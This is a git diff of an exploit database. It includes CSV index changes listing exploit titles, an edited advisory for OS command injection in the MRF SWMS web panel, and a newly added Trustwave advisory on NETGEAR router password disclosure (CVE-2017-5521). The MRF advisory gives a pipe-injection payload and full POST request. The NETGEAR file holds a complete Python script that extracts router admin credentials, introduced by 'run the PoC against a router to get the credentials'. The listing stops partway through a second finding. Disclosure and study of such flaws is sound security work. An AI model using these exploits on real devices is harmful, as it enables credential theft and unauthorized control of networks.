16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
|
@ -10982,8 +10983,8 @@ id,file,description,date,author,platform,type,port
|
|||
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
|
||||
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
|
||||
16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
|
||||
16860,platforms/linux/remote/16860.rb,"Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
|
||||
16861,platforms/linux/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
|
||||
16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0
|
||||
16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0
|
||||
16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
|
||||
16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
|
||||
16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
|
||||
|
@ -11002,7 +11003,7 @@ id,file,description,date,author,platform,type,port
|
|||
16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
|
||||
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
|
||||
16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
|
||||
16880,platforms/linux/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
|
||||
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
|
||||
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
|
||||
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
|
||||
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
|
||||
|
@ -12360,7 +12361,7 @@ id,file,description,date,author,platform,type,port
|
|||
21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0
|
||||
21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0
|
||||
21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0
|
||||
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - RPC Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
|
||||
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
|
||||
21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0
|
||||
21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0
|
||||
21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0
|
||||
|
@ -13433,7 +13434,7 @@ id,file,description,date,author,platform,type,port
|
|||
26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0
|
||||
26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
|
||||
40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161
|
||||
26737,platforms/linux/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
|
||||
26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0
|
||||
26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
|
||||
26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0
|
||||
26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0
|
||||
|
@ -13850,7 +13851,7 @@ id,file,description,date,author,platform,type,port
|
|||
32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
|
||||
33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443
|
||||
32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0
|
||||
32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0
|
||||
32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
|
||||
30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0
|
||||
30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0
|
||||
30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0
|
||||
|
@ -20650,7 +20651,7 @@ id,file,description,date,author,platform,type,port
|
|||
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Parameter Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
|
||||
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0
|
||||
7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0
|
||||
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
|
||||
7965,platforms/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
|
||||
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
|
||||
7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
|
||||
7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
|
||||
|
@ -26907,9 +26908,9 @@ id,file,description,date,author,platform,type,port
|
|||
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
|
||||
24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0
|
||||
24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0
|
||||
24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24256,platforms/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0
|
||||
24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0
|
||||
24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0
|
||||
24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection",2013-01-21,haidao,php,webapps,0
|
||||
|
@ -26950,7 +26951,7 @@ id,file,description,date,author,platform,type,port
|
|||
24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0
|
||||
24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0
|
||||
24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0
|
||||
24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
|
||||
24334,platforms/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0
|
||||
24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0
|
||||
24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0
|
||||
24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps,0
|
||||
|
@ -27757,7 +27758,7 @@ id,file,description,date,author,platform,type,port
|
|||
25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - suggest_review.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0
|
||||
25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
|
||||
25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0
|
||||
25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
|
||||
25740,platforms/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0
|
||||
25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0
|
||||
25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
|
||||
25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0
|
||||
|
@ -27936,7 +27937,7 @@ id,file,description,date,author,platform,type,port
|
|||
25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0
|
||||
25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0
|
||||
25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0
|
||||
25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
|
||||
25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
|
||||
25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0
|
||||
25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
|
||||
25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps,0
|
||||
|
@ -33846,7 +33847,7 @@ id,file,description,date,author,platform,type,port
|
|||
34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0
|
||||
34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting",2014-10-09,"Frank Lycops",multiple,webapps,0
|
||||
34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0
|
||||
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
|
||||
34933,platforms/php/webapps/34933.txt,"Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
|
||||
34934,platforms/php/webapps/34934.pl,"Joomla! Component Projects 'com_projects' - SQL Injection / Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0
|
||||
34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0
|
||||
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
|
||||
|
@ -37133,6 +37134,9 @@ id,file,description,date,author,platform,type,port
|
|||
41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
|
||||
41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
|
||||
41205,platforms/hardware/webapps/41205.py,"Multiple Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",hardware,webapps,0
|
||||
41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41204,platforms/php/webapps/41204.txt,"Video Sharing Script 4.94 - 'uid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
|
||||
41208,platforms/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -12,48 +12,43 @@ Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
|
|||
|
||||
-----------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
|
||||
The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
|
||||
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
|
||||
attacks.
|
||||
|
||||
Affected parameter: MSM_MACRO_NAME (POST parameter)
|
||||
Affected file: ms.cgi (/swms/ms.cgi)
|
||||
Verified Affected Operation: Show Fatal Error and Log Package Configuration
|
||||
> Affected parameter: MSM_MACRO_NAME (POST parameter)
|
||||
> Affected file: ms.cgi (/swms/ms.cgi)
|
||||
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
|
||||
|
||||
It is possible to use the pipe character (|) to inject arbitrary OS commands
|
||||
and retrieve the output in the application's responses.
|
||||
and retrieve the output in the application's responses:
|
||||
|
||||
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
|
||||
|
||||
|
||||
Proof Of Concept:
|
||||
|
||||
The attacker can login to the web panel as a standard user (non-administrator account)
|
||||
and inject the POST parameter: MSM_MACRO_NAME with the following
|
||||
payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
|
||||
As a result the attacker receives the result of the command in the application response
|
||||
|
||||
In order to reproduce the vulnerability:
|
||||
|
||||
1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
|
||||
https://vulnsite.com/swms
|
||||
|
||||
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
|
||||
and send the following POST request in order to retrieve the output of the 'pwd' command:
|
||||
1. Login to the vulnerable MRF web panel (with a standard user account):
|
||||
https://<vulnerable>/swms
|
||||
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
|
||||
3. Modify and send the following POST request:
|
||||
|
||||
POST /swms/ms.cgi HTTP/1.1
|
||||
Host: vulnhost
|
||||
Host: <vulnerable>
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
|
||||
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 213
|
||||
|
||||
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
|
||||
|
||||
3. You can see the output of the command 'pwd' in the server response:
|
||||
4. Check the output of the injected command 'pwd' in the response:
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Thu, 21 Jul 2016 08:18:43 GMT
|
||||
|
@ -75,4 +70,4 @@ as a platform for attacks against other systems.
|
|||
|
||||
Disclaimer:
|
||||
|
||||
The responsible disclosure policy has been followed
|
||||
The responsible disclosure policy has been followed
|
358
platforms/hardware/webapps/41205.py
Executable file
358
platforms/hardware/webapps/41205.py
Executable file
|
@ -0,0 +1,358 @@
|
|||
Trustwave SpiderLabs Security Advisory TWSL2017-003:
|
||||
Multiple Vulnerabilities in NETGEAR Routers
|
||||
|
||||
Published: 01/30/2017
|
||||
Version: 1.0
|
||||
|
||||
Vendor: NETGEAR (http://www.netgear.com/)
|
||||
Product: Multiple products
|
||||
|
||||
Finding 1: Remote and Local Password Disclosure
|
||||
Credit: Simon Kenin of Trustwave SpiderLabs
|
||||
CVE: CVE-2017-5521
|
||||
|
||||
Version affected:
|
||||
|
||||
# AC1450 V1.0.0.34_10.0.16 (Latest)
|
||||
# AC1450 V1.0.0.22_1.0.10
|
||||
# AC1450 V1.0.0.14_1.0.6
|
||||
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
|
||||
# D6400 V1.0.0.34_1.3.34
|
||||
# D6400 V1.0.0.38_1.1.38
|
||||
# D6400 V1.0.0.22_1.0.22
|
||||
# DC112A V1.0.0.30_1.0.60 (Latest)
|
||||
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
|
||||
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
|
||||
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
|
||||
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
|
||||
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
|
||||
# R6300 V1.0.2.78_1.0.58 (Latest)
|
||||
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
|
||||
# R6300v2 V1.0.3.30_10.0.73
|
||||
# R6700 V1.0.1.14_10.0.29 (Latest beta)
|
||||
# R6700 V1.0.0.26_10.0.26 (Latest stable)
|
||||
# R6700 V1.0.0.24_10.0.18
|
||||
# R6900 V1.0.0.4_1.0.10 (Latest)
|
||||
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
|
||||
# R8300 V1.0.2.48_1.0.52
|
||||
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
|
||||
# R8500 V1.0.2.26_1.0.41
|
||||
# R8500 V1.0.0.56_1.0.28
|
||||
# R8500 V1.0.0.20_1.0.11
|
||||
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
|
||||
# VEGN2610 V1.0.0.29_1.0.29
|
||||
# VEGN2610 V1.0.0.27_1.0.27
|
||||
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
|
||||
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
|
||||
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
|
||||
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
|
||||
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
|
||||
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
|
||||
# WNDR4500v2 V1.0.0.42_1.0.25
|
||||
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
|
||||
# WGR614v10 V1.0.2.58_60.0.84NA
|
||||
# WGR614v10 V1.0.2.54_60.0.82NA
|
||||
# WN3100RP V1.0.0.14_1.0.19 (Latest)
|
||||
# WN3100RP V1.0.0.6_1.0.12
|
||||
|
||||
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
|
||||
# Lenovo R3220 V1.0.0.13_1.0.13
|
||||
|
||||
|
||||
Product description:
|
||||
Multiple Netgear Routers
|
||||
|
||||
Many Netgear routers are prone to password disclosure via simple crafted
|
||||
requests to the web management server. The bug is exploitable remotely if the
|
||||
remote management option is set and can also be exploited given access to the
|
||||
router over LAN or WLAN.
|
||||
|
||||
When trying to access the web panel a user is asked to authenticate, if the
|
||||
authentication is cancelled and password recovery is not enabled, the user is
|
||||
redirected to a page which exposes a password recovery token. If a user
|
||||
supplies the correct token to the page
|
||||
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
|
||||
enabled), they will receive the admin password for the router.
|
||||
|
||||
If password recovery is set the exploit will fail, as it will ask the user for the recovery
|
||||
questions which were previously set when enabling the feature, this is
|
||||
persistent, even after disabling the recovery option the exploit will fail,
|
||||
because the router will ask for the security questions.
|
||||
This can easily be reproduced using the attached poc, or by sending these two
|
||||
simple requests via the browser:
|
||||
1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token
|
||||
2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
|
||||
|
||||
## netgore.py
|
||||
import sys
|
||||
import requests
|
||||
|
||||
|
||||
def scrape(text, start_trig, end_trig):
|
||||
if text.find(start_trig) != -1:
|
||||
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
|
||||
else:
|
||||
return "i_dont_speak_english"
|
||||
#disable nasty insecure ssl warning
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
#1st stage - get token
|
||||
ip = sys.argv[1]
|
||||
port = sys.argv[2]
|
||||
url = 'http://' + ip + ':' + port + '/'
|
||||
try:
|
||||
r = requests.get(url)
|
||||
except:
|
||||
url = 'https://' + ip + ':' + port + '/'
|
||||
r = requests.get(url, verify=False)
|
||||
model = r.headers.get('WWW-Authenticate')
|
||||
if model is not None:
|
||||
print "Attcking: " + model[13:-1]
|
||||
else:
|
||||
print "not a netgear router"
|
||||
sys.exit(0)
|
||||
token = scrape(r.text, 'unauth.cgi?id=', '\"')
|
||||
if token == 'i_dont_speak_english':
|
||||
print "not vulnerable"
|
||||
sys.exit(0)
|
||||
print "token found: " + token
|
||||
#2nd stage - pass the token - get the password
|
||||
url = url + 'passwordrecovered.cgi?id=' + token
|
||||
r = requests.post(url, verify=False)
|
||||
#profit
|
||||
if r.text.find('left\">') != -1:
|
||||
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
|
||||
username = scrape(username, '>', '\'')
|
||||
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
|
||||
password = scrape(password, '>', '\'')
|
||||
if username == "i_dont_speak_english":
|
||||
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
|
||||
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
|
||||
else:
|
||||
print "not vulnerable becuse password recovery IS set"
|
||||
sys.exit(0)
|
||||
#html encoding pops out of nowhere, lets replace that
|
||||
password = password.replace("#","#")
|
||||
password = password.replace("&","&")
|
||||
print "user: " + username
|
||||
print "pass: " + password
|
||||
|
||||
================================
|
||||
Just run the PoC against a router to get the credentials if it is vulnerable.
|
||||
|
||||
|
||||
|
||||
Finding 2: Remote and Local Password Disclosure
|
||||
Credit: Simon Kenin of Trustwave SpiderLabs
|
||||
CVE: CVE-2017-5521
|
||||
|
||||
Version affected:
|
||||
|
||||
# AC1450 V1.0.0.34_10.0.16 (Latest)
|
||||
# AC1450 V1.0.0.22_1.0.10
|
||||
# AC1450 V1.0.0.14_1.0.6
|
||||
# D6300 V1.0.0.96_1.1.96 (Latest)
|
||||
# D6300B V1.0.0.36_1.0.36
|
||||
# D6300B V1.0.0.32_1.0.32
|
||||
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
|
||||
# D6400 V1.0.0.22_1.0.22
|
||||
# DC112A V1.0.0.30_1.0.60 (Latest)
|
||||
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
|
||||
# DGN2200v4 V1.0.0.66_1.0.66
|
||||
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
|
||||
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
|
||||
# R6200 V1.0.1.56_1.0.43 (Latest)
|
||||
# R6200 V1.0.1.52_1.0.41
|
||||
# R6200 V1.0.1.48_1.0.37
|
||||
# R6200v2 V1.0.3.10_10.1.10 (Latest)
|
||||
